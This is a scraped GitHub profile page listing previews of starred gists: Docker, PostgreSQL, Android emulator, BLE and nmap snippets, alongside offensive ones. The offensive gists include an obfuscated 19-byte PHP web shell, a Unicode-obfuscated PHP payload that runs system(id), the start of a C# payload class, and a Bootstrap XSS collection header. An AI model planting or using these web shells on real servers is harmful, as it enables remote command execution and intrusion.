Skip to content

Instantly share code, notes, and snippets.

View dubs3c's full-sized avatar
😈
I solemnly swear that I am up to no good

dubs3c dubs3c

😈
I solemnly swear that I am up to no good
65 followers · 189 following
View GitHub Profile
@terjanq
terjanq / rev_shell.php
Last active January 30, 2024 21:53
The shortest non-alphanumeric reverse shell script (19 bytes)
<?=`{${~"\xa0\xb8\xba\xab"}["\xa0"]}`;
/*
* In terminal:
* $ echo -ne '<?=`{${~\xa0\xb8\xba\xab}[\xa0]}`;' > rev_shell.php
* This is how the code will be produced, \xa0\xb8\xba\xab will be
* treated as constant therefore no " needed. It is also not copyable
* string because of non-ascii characters
*
* Explanation:
@terjanq
terjanq / funny.php
Last active February 23, 2023 14:46
PHPF*ck
/* system(id) */
<?=$Φ=([].Φ)[![]+![]+![]]?><?=$Χ=++$Φ?><?=$Ψ=++$Χ?><?=$Ω=++$Ψ?><?=$Ϊ=++$Ω?><?=$Ϋ=++$Ϊ?><?=$ά=++$Ϋ?><?=$έ=++$ά?><?=$ή=++$έ?><?=$ί=++$ή?><?=$ΰ=++$ί?><?=$α=++$ΰ?><?=$β=++$α?><?=$γ=++$β?><?=$δ=++$γ?><?=$ε=++$δ?><?=$ζ=++$ε?><?=$η=++$ζ?><?=$θ=++$η?><?=$ι=++$θ?><?=$κ=++$ι?><?=$λ=++$κ?><?=$μ=++$λ?><?=$ν=++$μ?><?=$ξ=++$ν?><?=$ο=++$ξ?><?=$ο=([].Φ)[![]+![]+![]]?><?=($η.$ν.$η.$θ.$Ω.$α)($έ.$Ψ)?>
<!--
Explanation:
- Some of the characters might look like alphanumeric, but they are Unicode characters.
- 'ArrayΦ' <-> [].Φ
- 1 <-> ![]
- 'a' <-> ([].Φ)[![]+![]+![]]
@rvrsh3ll
rvrsh3ll / blockdlls_gadget2jscript.cs
Last active January 24, 2022 14:45
using System;
using System.IO;
using System.Net;
using System.Diagnostics;
using System.IO.Compression;
using System.Runtime.InteropServices;
public class Payload
{
public Payload()
@saiyam1814
saiyam1814 / gist:eaa9a7d8e037d168d993e37b80101391
Last active December 4, 2020 03:28
Docker security 101
#Docker content trust
export DOCKER_CONTENT_TRUST=1
docker pull nginx
#see the key for the image pulled
docker trust inspect --pretty nginx
#pull image from some other non trusted repository
docker pull saiyam911/red
==================================================
#getting the image ID's
@BlackFan
BlackFan / Bootstrap_XSS.md
Last active April 24, 2024 20:28
Bootstrap XSS Collection

CVE-2019-8331

Bootstrap < 3.4.1 || < 4.3.1

✔️ CSP strict-dynamic bypass

➖ Requires user interaction

➖ Requires $('[data-toggle="tooltip"]').tooltip();

@y0ug
y0ug / android_emulator.md
Last active March 7, 2022 14:14

Android Emulator

Packages

brew cask install adoptopenjdk8
brew cask install android-sdk
brew cask install intel-haxm

Setup

@hackgnar
hackgnar / ghetto_bleah.sh
Last active September 26, 2023 07:46
Ghetto Gatttool Bleah Output
#!/bin/bash
# run with the following syntax:
# ./ghetto_bleah.sh 11:22:33:44:55:66
mac=$1 ;
while read i;
do
printf "%s " $(echo -n $i|awk '{printf "%s : ", $1'});
printf "%s " $(echo -n $i|awk '{printf "%s : ", $3'});
#printf "%s : " $(echo -n $i|awk '{printf "%s", $2'});
@azet
azet / psql_internals_cheatsheet.sql
Last active March 5, 2021 14:57
PostgreSQL internals SQL collection
# long running queries:
SELECT
pid,
now() - pg_stat_activity.query_start AS duration,
query,
state
FROM pg_stat_activity
WHERE (now() - pg_stat_activity.query_start) > interval '5 minutes';
## active queries and killing them:
@fnky
fnky / ANSI.md
Last active May 2, 2024 15:51
ANSI Escape Codes

ANSI Escape Sequences

Standard escape codes are prefixed with Escape:

  • Ctrl-Key: ^[
  • Octal: \033
  • Unicode: \u001b
  • Hexadecimal: \x1B
  • Decimal: 27
@coffeegist
coffeegist / nmap-tcp-full.sh
Last active May 23, 2022 20:20
OSCP nmap scripts
if [ "$#" -ne 3 ]; then
echo "Usage: nmap-tcp-full.sh <TCP-QUICK-RESULTS.XML> <TARGET> <OUTPUT-FILENAME>"
exit 1
fi
nmap -nvv -Pn -sSV -T1 -p$(cat $1 | grep portid | grep protocol=\"tcp\" | cut -d'"' -f4 | paste -sd "," -) --version-intensity 9 -A -oA $3 $2